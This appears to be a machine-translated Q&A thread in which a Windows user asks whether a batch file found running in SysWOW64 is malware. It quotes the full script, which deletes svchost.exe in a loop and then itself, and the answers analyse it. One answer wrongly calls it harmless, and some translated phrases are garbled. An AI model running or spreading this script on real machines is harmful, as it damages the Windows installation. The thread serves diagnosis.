Это (del.bat) вредоносная программа или шутка?

Question

Вчера я обнаружил следующий пакетный файл, работающий в моей папке SysWOW64:

@Echo Off
cd /d C:\Windows\SysWOW64\
:Start
del svchost.exe
If Exist svchost.exe Goto Start
del %0

Я обнаружил это, когда открыл диспетчер задач, потому что терял батарею как сумасшедший. Я понятия не имею, как он начал работать, потому что для него не было запланированных задач, никаких служб, запуска и т.д., И он работал без видимого окна (только cmd.exe)

К сожалению, я убил его в спешке, так как это максимизировало ресурсы, поэтому я не уловил аргументы, которые помогли бы получить больше смысла из этого. Кто-нибудь испытывал это раньше? Я попытался запустить файл через virustotal, который утверждает, что он абсолютно безопасен. Или это шутка или что-то?

PS работает под управлением Windows 10, полностью обновлена. Malwarebytes ничего не обнаруживает.

Изменить: Некоторые исследования привели меня к вредоносной программе DDos Xuhuan, но у меня нет ключей реестра и других файлов, упомянутых мой McAffe, а также нет запросов брандмауэра от explorer.exe

Редактировать 2: Virustotal теперь полон положительных отчетов, так что я думаю, что это больше не проблема!

Answer 1

Давайте пройдемся по этой строке за раз.

@Echo Off

Команды пакетного скрипта не будут выводиться на консоль при запуске.

cd /d C:\Windows\SysWOW64\

Сценарий перейдет в папку SysWOW64 на диске C:\ . Ключ /d заставляет скрипт изменить текущий диск на C:\ если он будет другим.

:Start

Это ярлык, который упоминается позже.

del svchost.exe

Если svchost.exe существует в текущем каталоге, удалите его. Это не отправляет его в корзину; это навсегда, если вам не повезло с программным обеспечением для восстановления файлов. Обратите внимание, что при этом удаляется исполняемый файл svchost.exe который используется для 32-разрядных служб, работающих в 64-разрядной системе. svchost.exe также находится в вашей папке System32 , которая в 64-разрядной системе используется для 64-разрядных служб (в то время как в 32-разрядной системе она используется для 32-разрядных служб).

If Exist svchost.exe Goto Start

Если svchost.exe все еще существует по какой-либо причине, сценарий будет возвращаться к метке :Start определенной ранее, и затем будет пытаться снова запустить del svchost.exe пока не будет удален.

del %0

После удаления svchost.exe оператор If не будет возвращаться к метке, а вместо этого выполнит ее. Обычно это заставит скрипт удалить свой собственный файл, однако, согласно этому комментарию на SO-ответ, это не сработает, так как текущий путь изменился бы?

Я бы не стал его запускать, если вы цените свою операционную систему.

Что касается разрядки вашей батареи, я вижу, что она работает бесконечно, если не может удалить svchost.exe (не хватает прав, файл используется?). В этом случае скрипт будет пытаться удалить файл сотни, если не тысячи раз в секунду; Я вижу, как трескающий жесткий диск истощает процессор (спасибо Sampo за исправление!), Разряжая батарею.

Answer 2

Для чего (мало) это стоит, Malwarebytes теперь обнаруживает это как троян.Агент.Trace (их общее «это противно, но мы не знаем, из какого это вируса»). Я нашел это в моей системе, которая представляет собой аппаратный рабочий стол. Я живу один. Я понятия не имею, как он туда попал, так что все это довольно пугающе.

Напоминает мне о старых классических вирусах 90-х годов. Они не хотели запечатать информацию о вашей кредитной карте или использовать ваш компьютер для моего, они просто хотят испортить вашу установку Windows.

Answer 3

Этот файл не является вирусом. Он удаляет только файл "svchost.exe" и пытается выполнить задачу (удалить), если этот файл все еще существует.